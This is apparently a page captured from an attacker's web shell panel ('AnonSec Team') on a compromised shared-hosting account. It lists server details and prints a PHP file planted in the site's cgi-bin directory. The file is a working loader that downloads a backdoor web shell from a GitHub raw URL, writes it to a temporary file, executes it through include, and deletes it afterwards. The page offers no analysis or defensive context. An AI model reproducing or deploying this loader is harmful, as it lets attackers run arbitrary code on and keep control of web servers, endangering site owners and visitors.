AnonSec Team
Server IP : 198.54.120.203  /  Your IP : 216.73.216.181
Web Server : LiteSpeed
System : Linux premium58.web-hosting.com 4.18.0-553.58.1.lve.el8.x86_64 #1 SMP Fri Jul 4 12:07:06 UTC 2025 x86_64
User : greakqsw ( 1698)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/greakqsw/theblogginglab.org/7648l2-20260309055551/../1j67kd-20260312064026/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/greakqsw/theblogginglab.org/7648l2-20260309055551/../1j67kd-20260312064026/xva9t.php.tar
home/greakqsw/theblogginglab.org/cgi-bin/oc6dub/xva9t.php000064400000001726151531121670017344 0ustar00<?php
ini_set('display_errors', 1);
error_reporting(E_ALL);

function fetch_code($url) {
    $code = @file_get_contents($url);
    if ($code && strlen(trim($code)) > 10) return $code;

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        CURLOPT_USERAGENT => 'Mozilla/5.0',
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT => 10,
    ]);
    $code = curl_exec($ch);
    curl_close($ch);

    return $code;
}

$url = "https://raw.githubusercontent.com/Yucaerin/simplecmdandbackdoor/refs/heads/main/ws.php";
$code = fetch_code($url);

if (!$code || strlen(trim($code)) < 10) {
    die("❌");
}

$tmp = "tmp_" . md5(uniqid()) . ".php";
if (!file_put_contents($tmp, $code)) {
    die("❌");
}

ob_start();
include($tmp);
$output = ob_get_clean();
unlink($tmp);

if (trim($output) === "") {
    echo "⚠";
} else {
    echo $output;
}
?>

AnonSec - 2021